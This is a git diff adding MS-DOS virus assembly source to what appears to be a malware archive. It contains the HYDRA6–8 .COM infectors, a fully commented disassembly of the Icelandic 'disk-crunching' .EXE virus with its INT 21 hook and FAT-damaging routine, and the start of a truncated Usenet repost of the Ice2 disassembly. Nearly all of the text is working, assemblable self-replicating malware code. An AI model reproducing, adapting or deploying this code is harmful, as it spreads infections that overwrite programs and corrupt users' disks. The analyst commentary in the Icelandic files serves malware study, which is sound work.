+ int 20h ; DOS program terminate + +hydra5 endp + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.hydra6.asm b/MSDOS/Virus.MSDOS.Unknown.hydra6.asm new file mode 100644 index 00000000..a3e942aa --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hydra6.asm @@ -0,0 +1,174 @@ + +PAGE 59,132 + +; +; +; HYDRA6 +; +; Created: 27-Aug-91 +; Passes: 5 Analysis Options on: AW +; Copyright (c) +; +; + +psp_cmd_size equ 80h +data_14e equ 174h +data_15e equ 177h + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +hydra6 proc far + +start: + jmp loc_1 + pop cx + inc sp + add [bx+si],al +data_3 db 'HyDra-6 Beta - Not For Release' + db '. *.CO?' + db 0 +data_6 dw 0, 8B39h +data_8 dw 0 +data_9 db 0 + db 29 dup (0) +data_10 db 0 + db 13 dup (0) +copyright db 'Copyright (c)' + db ' 1991 by C.A.V.E. ' +data_11 db 'COMMAND.*', 0 +loc_1: + push ax + mov ax,cs + add ax,1000h + xor di,di ; Zero register + mov cx,174h + mov si,100h + mov es,ax + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ah,1Ah + mov dx,offset data_9 + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov ah,4Eh ; 'N' + mov dx,offset data_3+22h ; ('*') + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_5 ; Jump if carry Set +loc_2: + mov ah,3Dh ; '=' + mov al,2 + mov dx,offset data_10 + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + push es + pop ds + mov ax,3F00h + mov cx,0FFFFh + mov dx,data_14e + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + add ax,174h + mov cs:data_8,ax + cmp word ptr ds:data_15e,4459h + jne loc_3 ; Jump if not equal + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_6 ; Jump if carry Set + jmp short loc_2 +loc_3: + xor cx,cx ; Zero register + mov dx,cx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_4 ; Jump if carry Set + mov ah,40h ; '@' + xor dx,dx ; Zero register + mov cx,cs:data_8 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_4: + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds +loc_5: + mov ah,1Ah + mov dx,psp_cmd_size + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + jmp short loc_8 + nop +loc_6: + mov ah,1Ah + mov dx,offset data_9 + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + push dx + mov dx,offset data_11 ; ('COMMAND.*') + mov ah,4Eh ; 'N' + xor cx,cx ; Zero register + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_5 ; Jump if carry Set +loc_7: + mov ah,3Ch ; '<' + xor cx,cx ; Zero register + mov dx,offset data_10 + int 21h ; DOS Services ah=function 3Ch + ; create/truncate file @ ds:dx + mov bx,ax + jc loc_5 ; Jump if carry Set + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + jc loc_5 ; Jump if carry Set + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_7 ; Jump if carry=0 +loc_8: + xor di,di ; Zero register + mov si,252h + mov cx,22h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop bx + mov cs:data_6,0 + mov word ptr cs:data_6+2,es + pop bx + jmp dword ptr cs:data_6 + push ds + pop es + mov cx,0FFFFh + mov si,274h + mov di,100h + sub cx,si + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov word ptr cs:[100h],100h + mov word ptr cs:[102h],ds + mov ax,bx + jmp dword ptr cs:[100h] + int 20h ; DOS program terminate + +hydra6 endp + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.hydra7.asm b/MSDOS/Virus.MSDOS.Unknown.hydra7.asm new file mode 100644 index 00000000..f012bf9e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hydra7.asm @@ -0,0 +1,175 @@ + +PAGE 59,132 + +; +; +; HYDRA7 +; +; Created: 27-Aug-91 +; Passes: 5 Analysis Options on: AW +; Copyright (c) +; +; + +psp_cmd_size equ 80h +data_16e equ 170h +data_17e equ 173h + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +hydra7 proc far + +start: + jmp loc_1 + pop cx + inc sp + add [bx+si],al +data_4 db 'HyDra-7 Beta - Not For Release' + db '. *.CO?' + db 0 +data_7 dw 0, 8B39h +data_9 dw 0 +data_10 db 0 + db 29 dup (0) +data_11 db 0 + db 13 dup (0) +copyright db 'Copyright (c)' + db ' 1991 by C.A.V.E. ' +data_12 db 2Ah + db 2Eh, 45h, 58h, 45h, 00h +loc_1: + push ax + mov ax,cs + add ax,1000h + xor di,di ; Zero register + mov cx,170h + mov si,100h + mov es,ax + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ah,1Ah + mov dx,offset data_10 + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov ah,4Eh ; 'N' + mov dx,offset data_4+22h ; ('*') + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_5 ; Jump if carry Set +loc_2: + mov ah,3Dh ; '=' + mov al,2 + mov dx,offset data_11 + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + push es + pop ds + mov ax,3F00h + mov cx,0FFFFh + mov dx,data_16e + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + add ax,170h + mov cs:data_9,ax + cmp word ptr ds:data_17e,4459h + jne loc_3 ; Jump if not equal + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_6 ; Jump if carry Set + jmp short loc_2 +loc_3: + xor cx,cx ; Zero register + mov dx,cx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_4 ; Jump if carry Set + mov ah,40h ; '@' + xor dx,dx ; Zero register + mov cx,cs:data_9 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_4: + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds +loc_5: + mov ah,1Ah + mov dx,psp_cmd_size + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + jmp short loc_8 + nop +loc_6: + mov ah,1Ah + mov dx,offset data_10 + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + push dx + mov dx,offset data_12 + mov ah,4Eh ; 'N' + xor cx,cx ; Zero register + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_5 ; Jump if carry Set +loc_7: + mov ah,3Ch ; '<' + xor cx,cx ; Zero register + mov dx,offset data_11 + int 21h ; DOS Services ah=function 3Ch + ; create/truncate file @ ds:dx + mov bx,ax + jc loc_5 ; Jump if carry Set + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + jc loc_5 ; Jump if carry Set + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_7 ; Jump if carry=0 +loc_8: + xor di,di ; Zero register + mov si,24Eh + mov cx,22h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop bx + mov cs:data_7,0 + mov word ptr cs:data_7+2,es + pop bx + jmp dword ptr cs:data_7 + push ds + pop es + mov cx,0FFFFh + mov si,270h + mov di,100h + sub cx,si + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov word ptr cs:[100h],100h + mov word ptr cs:[102h],ds + mov ax,bx + jmp dword ptr cs:[100h] + int 20h ; DOS program terminate + +hydra7 endp + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.hydra8.asm b/MSDOS/Virus.MSDOS.Unknown.hydra8.asm new file mode 100644 index 00000000..edce3fa8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hydra8.asm @@ -0,0 +1,220 @@ + +PAGE 59,132 + +; +; +; HYDRA8 +; +; Created: 28-Aug-91 +; Passes: 5 Analysis Options on: W +; Copyright (c) +; +; + +psp_cmd_size equ 80h +data_17e equ 1EFh +data_18e equ 1F2h +data_19e equ 9D9Ah + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +hydra8 proc far + +start: + jmp loc_3 + db 59h, 44h, 00h, 00h +data_3 db 'HyDra-8 Beta - Not For Release' + db '. *.CO?' + db 0 +data_6 dw 0, 8B39h +data_8 dw 0 +data_9 db 0 + db 18 dup (0) +data_10 db 0 + db 10 dup (0) +data_11 db 0 + db 0, 0, 0, 0, 0, 0 +data_12 db 0 + db 0, 0, 0, 0, 0, 0 +copyright db 'Copyright (c)' + db ' 1991 by C.A.V.E. ' +data_13 db 2Ah + db 2Eh, 45h, 58h, 45h, 00h +data_14 db 33h + db 0C9h, 1Eh, 52h,0E8h, 06h, 00h + db 0E8h, 13h, 00h,0EBh, 36h, 90h + db 0BEh, 48h, 01h + db 0BFh, 5Ah, 01h,0B9h, 12h, 00h + +locloop_1: + xor byte ptr [si],0F5h + movsb ; Mov [si] to es:[di] + loop locloop_1 ; Loop if cx > 0 + + retn + db 0B8h, 00h, 0Fh,0CDh, 10h,0B4h + db 00h,0CDh, 10h,0B8h, 00h, 02h + db 0B6h, 0Ch,0B2h, 1Fh,0CDh, 10h + db 33h,0D2h + db 0BAh, 5Ah, 01h,0B4h, 09h,0CDh + db 21h,0B8h, 00h, 02h,0B6h, 18h + db 0B2h, 00h,0CDh, 10h,0C3h + db 0B8h, 00h, 4Ch,0CDh, 21h, 00h + db 0A2h, 9Dh, 9Ah,0F5h, 9Ch, 86h + db 0F5h + db 0BFh, 9Ah, 9Dh, 9Bh,0F5h,0B2h + db 94h, 99h, 81h,0CAh,0D1h +loc_3: + push ax + mov ax,cs + add ax,1000h + xor di,di ; Zero register + mov cx,1EFh + mov si,100h + mov es,ax + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ah,1Ah + mov dx,offset data_9 + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov ah,4Eh ; 'N' + mov dx,offset data_3+22h ; ('*') + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_7 ; Jump if carry Set +loc_4: + mov ah,3Dh ; '=' + mov al,2 + mov dx,offset data_11 + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + push es + pop ds + mov ax,3F00h + mov cx,0FFFFh + mov dx,data_17e + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + add ax,1EFh + mov cs:data_8,ax + cmp word ptr ds:data_18e,4459h + jne loc_5 ; Jump if not equal + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_8 ; Jump if carry Set + jmp short loc_4 +loc_5: + xor cx,cx ; Zero register + mov dx,cx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_6 ; Jump if carry Set + mov ah,40h ; '@' + xor dx,dx ; Zero register + mov cx,cs:data_8 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_6: + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds +loc_7: + mov ah,1Ah + mov dx,psp_cmd_size + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + jmp short loc_11 + db 90h +loc_8: + clc ; Clear carry flag + xor cx,cx ; Zero register + push ds + push dx + mov ah,1Ah + mov dx,offset data_9 + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov dx,offset data_13 + mov ah,4Eh ; 'N' + xor cx,cx ; Zero register + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_7 ; Jump if carry Set +loc_9: + mov ah,3Ch ; '<' + xor cx,cx ; Zero register + mov dx,offset data_11 + int 21h ; DOS Services ah=function 3Ch + ; create/truncate file @ ds:dx + mov bx,ax + jc loc_7 ; Jump if carry Set + mov ax,3D02h + mov dx,offset data_11 + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + clc ; Clear carry flag + xor dx,dx ; Zero register + mov ah,40h ; '@' + mov dx,offset data_14 + mov cx,5Ah + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + cmp ax,5Ah + jb loc_10 ; Jump if below + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + jc loc_10 ; Jump if carry Set + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_9 ; Jump if carry=0 +loc_10: + mov ax,4C00h + int 21h ; DOS Services ah=function 4Ch + ; terminate with al=return code +loc_11: + xor di,di ; Zero register + mov si,offset data_15 + mov cx,22h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop bx + mov cs:data_6,0 + mov word ptr cs:data_6+2,es + pop bx + jmp dword ptr cs:data_6 +data_15 db 1Eh + db 07h,0B9h,0FFh,0FFh,0BEh,0EFh + db 02h,0BFh, 00h, 01h, 2Bh,0CEh + db 0F3h,0A4h, 2Eh,0C7h, 06h, 00h + db 01h, 00h, 01h, 2Eh, 8Ch, 1Eh + db 02h, 01h, 8Bh,0C3h, 2Eh,0FFh + db 2Eh, 00h, 01h,0CDh + db 20h + +hydra8 endp + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.ice1.asm b/MSDOS/Virus.MSDOS.Unknown.ice1.asm new file mode 100644 index 00000000..d7a44779 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ice1.asm @@ -0,0 +1,558 @@ +; THE ICELANDIC "DISK-CRUNCHING" VIRUS +; +; Another possible name for this virus might be "One-in-ten", since +; it tries to infect every tenth program run. The Icelandic name for +; this virus ("Diskaetuvirus") translates to "Disk-eating virus" +; +; It was first located at one site in mid-June '89. It has since then +; been found at a few other places, but is quite rare yet. So far it +; does not seem to have spread to any other country. +; +; Disassembly done in June/July '89. +; +; The author of this program is unknown, but it appears to be of +; Icelandic origin. +; +; All comments in this file were added by Fridrik Skulason, +; University of Iceland/Computing Services. +; +; INTERNET: frisk@rhi.hi.is +; UUCP: ...mcvax!hafro!rhi!frisk +; BIX: FRISK +; +; To anyone who obtains this file - please be careful with it, I +; would not like to see this virus be distributed too much. The code +; is very clear, and the virus is quite well written. It would be VERY +; easy to modify it to do something really harmful. +; +; A short description of the virus: +; +; It only infects .EXE files. Infected files grow by 656 to 671 +; bytes, and the length of the infected file MOD 16 will always be 0. +; The virus attaches itself to the end of the programs it infects. +; +; When an infected file is run, the virus copies itself to top of +; free memory, and modifies the memory blocks, in order to hide from +; memory mapping programs. Some programs may overwrite this area, +; causing the computer to crash. +; +; The virus does nothing if some other program has hooked INT 13 +; before it is run. This is probably done to avoid detection by +; protection programs, but it also means that many ordinary +; programs like SideKick and disk cache software will disable it. +; Even the PRINT command will disable the virus. This reduces the +; spread of the virus, but also greatly reduces the possibility that +; the virus will be detected. +; +; The virus will hook INT 21H and when function 4B (EXEC) is called +; it sometimes will infect the program being run. It will check every +; tenth program that is run for infection, and if it is not already +; infected, it will be. +; +; The virus will remove the Read-Only attribute before trying to +; infect programs. +; +; Infected files can be easily recognized, since they always end in +; 4418,5F19. +; +; To check for system infection, a byte at 0:37F is used - if it +; contains FF the virus is installed in memory. +; +; This virus is slightly harmful, but does no serious damage. +; On floppy-only, or machines with 10Mbyte hard disks it will do +; no damage at all, but on machines with larger hard disks it will +; select one unused entry in the FAT table, and mark it as bad, when it +; infects a file. Since the virus only modifies the first copy of the +; FAT, a quick fix is simply to copy the second table over the first. +; This is the only "mistake" I have found in this virus. It appears +; to be very well written - What a shame the programmer did not use +; his abilities for something more constructive. +; +; This file was created in the following way: I wrote a small program, +; that did nothing but write "Hello world!" and ran it several times, +; until it became infected. I then diassembled the program, changed +; it into an .ASM file, and worked on it until this file, when +; assembled, produced the same file as the original infected one. +; +; (Or almost the same - the checksum in the header is different). +; +VIRSIZ EQU 128 + + ASSUME CS:_TEXT,DS:_TEXT,SS:NOTHING,ES:NOTHING +; +; This is the original program. +; +_TEXT1 SEGMENT PARA PUBLIC 'CODE' +_START DB 0b4H,09H + PUSH CS + POP DS + MOV DX,OFFSET STRING + INT 21H + MOV AX,4C00H + INT 21H +STRING DB "Hello world!",0dh,0ah,"$" + _TEXT1 ENDS + +_TEXT SEGMENT PARA PUBLIC 'CODE' + +; +; The virus is basically divided in three parts. +; +; 1. The main program - run when an infected program is run. +; It will check if the system is already infected, and if not +; it will install the virus. +; +; 2. The new INT 21 handler. It will look for EXEC calls, and +; (sometimes) infect the program being run. +; +; 3. The damage routine. It will select one unused cluster and mark it +; as bad. +; +VIRUS PROC FAR +; +; This is a fake MCB +; + DB 'Z',00,00,VIRSIZ,0,0,0,0,0,0,0,0,0,0,0,0 +; +; The virus starts by pushing the original start address on the stack, +; so it can transfer control there when finished. +; +LABEL1: SUB SP,4 + PUSH BP + MOV BP,SP + PUSH AX + MOV AX,ES +; +; Put the the original CS on the stack. The ADD AX,data instruction +; is modified by the virus when it infects other programs. +; + DB 05H +ORG_CS DW 0010H + MOV [BP+4],AX +; +; Put the the original IP on the stack. This MOV [BP+2],data instruction +; is modified by the virus when it infects other programs. +; + DB 0C7H,46H,02H +ORG_IP DW 0000H +; +; Save all registers that are modified. +; + PUSH ES + PUSH DS + PUSH BX + PUSH CX + PUSH SI + PUSH DI +; +; Check if already installed. Quit if so. +; + XOR AX,AX + MOV ES,AX + CMP ES:[37FH],BYTE PTR 0FFH + JNE L1 +; +; Restore all registers and return to the original program. +; +EXIT: POP DI + POP SI + POP CX + POP BX + POP DS + POP ES + POP AX + POP BP + RET +; +; Check if INT 13 is 0070:xxxx or F000:xxxx. If not, assume some +; program is monitoring int 13, and quit. +; +L1: MOV AX,ES:[4EH] + CMP AX,0070H + JE L2 + CMP AX,0F000H + JNE EXIT +; +; Set the installation flag, so infected programs run later will +; recognize the infection. +; +L2: MOV ES:[37FH],BYTE PTR 0FFH +; +; The virus tries to hide from detection by modifying the memory block it +; uses, so it seems to be a block that belongs to the operating system. +; +; It looks rather weird, but it seems to work. +; + MOV AH,52H + INT 21H + MOV AX,ES:[BX-2] + MOV ES,AX + ADD AX,ES:[0003] + INC AX + INC AX + MOV CS:[0001],AX +; +; Next, the virus modifies the memory block of the infected program. +; It is made smaller, and no longer the last block. +; + MOV BX,DS + DEC BX + MOV DS,BX + MOV AL,'M' + MOV DS:[0000],AL + MOV AX,DS:[0003] + SUB AX,VIRSIZ + MOV DS:[0003],AX + ADD BX,AX + INC BX +; +; Then the virus moves itself to the new block. For some reason 2000 +; bytes are transferred, when 656 would be enough. Maybe the author just +; wanted to leave room for future expansions. +; + MOV ES,BX + XOR SI,SI + XOR DI,DI + PUSH CS + POP DS + MOV CX,2000 + CLD + REP MOVSB +; +; The virus then transfers control to the new copy of itself. +; + PUSH ES + MOV AX,OFFSET L3 + PUSH AX + RET +; +; The main program modifies INT 21 next and finally returns to the +; original program. The original INT 21 vector is stored inside the +; program so a JMP [OLD INT21] instruction can be used. +; +L3: XOR AX,AX + MOV ES,AX + MOV AX,ES:[0084H] + MOV CS:[OLD21],AX + MOV AX,ES:[0086H] + MOV CS:[OLD21+2],AX + MOV AX,CS + MOV ES:[0086H],AX + MOV AX,OFFSET NEW21 + MOV ES:[0084H],AX + JMP EXIT +VIRUS ENDP +; +; This is the INT 21 replacement. It only does something in the case +; of an EXEC call. +; +NEW21 PROC FAR + CMP AH,4BH + JE L5 +L4: DB 0EAH +OLD21 DW 0,0 +; +; Only attack every tenth program run. +; +L5: DEC CS:[COUNTER] + JNE L4 + MOV CS:[COUNTER],10 +; +; Save all affected registers. +; + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DS +; +; Search for the file name extension ... +; + MOV BX,DX +L6: INC BX + CMP BYTE PTR [BX],'.' + JE L8 + CMP BYTE PTR [BX],0 + JNE L6 +; +; ... and quit unless it starts with "EX". +; +L7: POP DS + POP SI + POP DX + POP CX + POP BX + POP AX + JMP L4 +L8: INC BX + CMP WORD PTR [BX],5845H + JNE L7 +; +; When an .EXE file is found, the virus starts by turning off +; the read-only attribute. The read-only attribute is not restored +; when the file has been infected. +; + MOV AX,4300H ; Get attribute + INT 21H + JC L7 + MOV AX,4301H ; Set attribute + AND CX,0FEH + INT 21H + JC L7 +; +; Next, the file is examined to see if it is already infected. +; The signature (4418 5F19) is stored in the last two words. +; + MOV AX,3D02H ; Open / write access + INT 21H + JC L7 + MOV BX,AX ; file handle in BX + PUSH CS ; now DS is no longer needed + POP DS +; +; The header of the file is read in at [ID+8]. The virus then +; modifies itself, according to the information stored in the +; header. (The original CS and IP addressed are stored). +; + MOV DX,OFFSET ID+8 + MOV CX,1CH + MOV AH,3FH + INT 21H + JC L9 + MOV AX,DS:ID[1CH] + MOV DS:[ORG_IP],AX + MOV AX,DS:ID[1EH] + ADD AX,10H + MOV DS:[ORG_CS],AX +; +; Next the read/write pointer is moved to the end of the file-4, +; and the last 4 bytes read. They are compared to the signature, +; and if equal nothing happens. +; + MOV AX,4202H + MOV CX,-1 + MOV DX,-4 + INT 21H + JC L9 + ADD AX,4 + MOV DS:[LEN_LO],AX + JNC L8A + INC DX +L8A: MOV DS:[LEN_HI],DX + + MOV AH,3FH + MOV CX,4 + MOV DX,OFFSET ID+4 + INT 21H + JNC L11 +L9: MOV AH,3EH + INT 21H +L10: JMP L7 +; +; Compare to 4418,5F19 +; +L11: MOV SI,OFFSET ID+4 + MOV AX,[SI] + CMP AX,4418H + JNE L12 + MOV AX,[SI+2] + CMP AX,5F19H + JE L9 +; +; The file is not infected, so the next thing the virus does is +; infecting it. First it is padded so the length becomes a multiple +; of 16 bytes. Tis is probably done so the virus code can start at a +; paragraph boundary. +; +L12: MOV AX,DS:[LEN_LO] + AND AX,0FH + JZ L13 + MOV CX,16 + SUB CX,AX + ADD DS:[LEN_LO],CX + JNC L12A + INC DS:[LEN_HI] +L12A: MOV AH,40H + INT 21H + JC L9 +; +; Next the main body of the virus is written to the end. +; +L13: XOR DX,DX + MOV CX,OFFSET ID + 4 + MOV AH,40H + INT 21H + JC L9 +; +; Next the .EXE file header is modified: +; +; First modify initial IP +; + MOV AX,OFFSET LABEL1 + MOV DS:ID[1CH],AX +; +; Modify starting CS = Virus CS. It is computed as: +; +; (Original length of file+padding)/16 - Start of load module +; + MOV DX,DS:[LEN_HI] + MOV AX,DS:[LEN_LO] + SHR DX,1 + RCR AX,1 + SHR DX,1 + RCR AX,1 + SHR DX,1 + RCR AX,1 + SHR DX,1 + RCR AX,1 + SUB AX,DS:ID[10H] + MOV DS:ID[1EH],AX +; +; Modify length mod 512 +; + ADD DS:[LEN_LO],OFFSET ID+4 + JNC L14 + INC DS:[LEN_HI] +L14: MOV AX,DS:[LEN_LO] + AND AX,511 + MOV DS:ID[0AH],AX +; +; Modify number of blocks used +; + MOV DX,DS:[LEN_HI] + MOV AX,DS:[LEN_LO] + ADD AX,511 + JNC L14A + INC DX +L14A: MOV AL,AH + MOV AH,DL + SHR AX,1 + MOV DS:ID[0CH],AX +; +; Finally the modified header is written back to the start of the +; file. +; +QQQ: MOV AX,4200H + XOR CX,CX + XOR DX,DX + INT 21H + JC ENDIT + MOV AH,40H + MOV DX,OFFSET ID+8 + MOV CX,1CH + INT 21H + JC ENDIT + MOV AH,3EH + INT 21H + JNC DAMAGE +; +; Infection is finished - close the file and execute it +; +ENDIT: JMP L9 +NEW21 ENDP +; +; The damage routine. As before noted, it will only do damage on +; systems with a hard disk larger than 10Mbytes (With 16 bit FAT) +; +TEMP DW 0 +; +; Start by getting some information about the current drive, like size +; of the FAT etc. Then compute the total number of sectors, and quit +; unless it is greater than 20740. This is probably done since larger +; disks use 16 bit FAT entries, instead of 12, which makes life easier +; for the programmer. +; +DAMAGE: MOV AH,32H + MOV DL,0 + INT 21H + CMP AL,0FFH + JE L21 + XOR AX,AX + MOV AL,[BX+4] + INC AX + MOV CS:[TEMP],AX + MOV AX,[BX+0DH] + DEC AX + MUL CS:[TEMP] + ADD AX,[BX+0BH] + JNC L15A + INC DX +L15A: CMP DX,0 + JNE L15B + CMP AX,20740 + JBE L21 +; +; Check if DOS version is 4.0 or greater. If so, use a 16 bit value +; for numbers of sectors in the FAT, otherwise use a 8 bit entry. +; +L15B: PUSH BX + MOV AH,30H + INT 21H + POP BX + CMP AL,4 + JAE L15 + XOR AX,AX + MOV AL,[BX+0FH] + JMP SHORT L16 +L15: MOV AX,[BX+0FH] +L16: ADD AX,[BX+6] + DEC AX + MOV DX,AX + MOV AL,[BX] +; +; Read the last sector in the first copy of the FAT. Search backwards +; for an unused entry. If none is found, read the sector before that +; and so on. If no free entry is found on the entire disk then quit. +; +L20: MOV CX,1 + MOV BX,OFFSET ID+4 + PUSH CS + POP DS + PUSH AX + PUSH DX + INT 25H + POPF + JC L21 + POP DX + POP AX + MOV SI,510 +L17: MOV BX,DS:[ID+4+SI] + CMP BX,0000 + JE L19 + CMP SI,0000 + JE L18 + DEC SI + DEC SI + JMP L17 +L18: DEC DX + CMP DX,8 + JE L21 + JMP L20 +; +; A free entry has been found. Make it look like a bad cluster, by +; changing the 0000 value to FFF7. +; +L19: MOV DS:[ID+4+SI],0FFF7H + MOV CX,1 + MOV BX,OFFSET ID+4 + INT 26H + POPF +L21: JMP L7 + +COUNTER DB 10 +LEN_LO DW ? +LEN_HI DW ? +ID DW 4418H,5F19H ; The signature of the virus. +; +; A buffer, used for data from the file. +; +_TEXT ENDS + + END LABEL1 + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.ice2.asm b/MSDOS/Virus.MSDOS.Unknown.ice2.asm new file mode 100644 index 00000000..1747c64e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ice2.asm @@ -0,0 +1,507 @@ +From netcom.com!ix.netcom.com!howland.reston.ans.net!gatech!bloom-beacon.mit.edu!uhog.mit.edu!rutgers!engr.orst.edu!gaia.ucs.orst.edu!myhost.subdomain.domain!clair Tue Nov 29 09:54:55 1994 +Xref: netcom.com alt.comp.virus:489 +Path: netcom.com!ix.netcom.com!howland.reston.ans.net!gatech!bloom-beacon.mit.edu!uhog.mit.edu!rutgers!engr.orst.edu!gaia.ucs.orst.edu!myhost.subdomain.domain!clair +From: clair@myhost.subdomain.domain (The Clairvoyant) +Newsgroups: alt.comp.virus +Subject: Ice2 Disassembly by f-prot author +Date: 28 Nov 1994 08:16:26 GMT +Organization: String to put in the Organization Header +Lines: 493 +Message-ID: <3bc3kq$mjc@gaia.ucs.orst.edu> +NNTP-Posting-Host: tempest.rhn.orst.edu +X-Newsreader: TIN [version 1.2 PL2] + + + +; THE ICELANDIC VIRUS - VERSION 2 +; +; Disassembly done in July '89. +; +; The author(s) of this program is(are) unknown, but it is of +; Icelandic origin. +; +; All comments in this file were added by Fridrik Skulason, +; University of Iceland/Computing Services. +; +; INTERNET: frisk@rhi.hi.is +; UUCP: ...mcvax!hafro!rhi!frisk +; BIX: FRISK +; +; To anyone who obtains this file - please be careful with it, I +; would not like to see this virus be distributed too much. The code +; is very clear, and the virus is quite well written. It would be VERY +; easy to modify it to do something really harmful. +; +; The virus has the following flaws: +; +; It modifies the date of the program it infects, making +; it easy to spot them. +; +; It removes the Read-only attribute from files, but does +; not restore it. +; +; This version appears to do no damage at all. This, and the fact that +; the author(s) sent me a copy probably indicates that it was just +; designed to demonstrate that a virus like this could be written. +; +; This file was created in the following way: +; +; I disassembled the new version and compared it to my disassembly +; of version #1. +; +; Any changes found were added to this file. +; +VIRSIZ EQU 128 + + ASSUME CS:_TEXT,DS:NOTHING,SS:NOTHING,ES:NOTHING +; +; This is a dummy "infected" program, so that this file, +; when assembled (using MASM) will produce a "true" infected +; program. +; +_TEXT1 SEGMENT PARA PUBLIC 'CODE' +_START DB 0b4H,09H + PUSH CS + POP DS + MOV DX,OFFSET STRING + INT 21H + MOV AX,4C00H + INT 21H +STRING DB "Hello world!",0dh,0ah,"$" + _TEXT1 ENDS + +_TEXT SEGMENT PARA PUBLIC 'CODE' + +; +; The virus is basically divided in two parts. +; +; 1. The main program - run when an infected program is run. +; It will check if the system is already infected, and if not +; it will install the virus. +; +; 2. The new INT 21 handler. It will look for EXEC calls, and +; (sometimes) infect the program being run. +; +VIRUS PROC FAR +; +; This is a fake MCB +; + DB 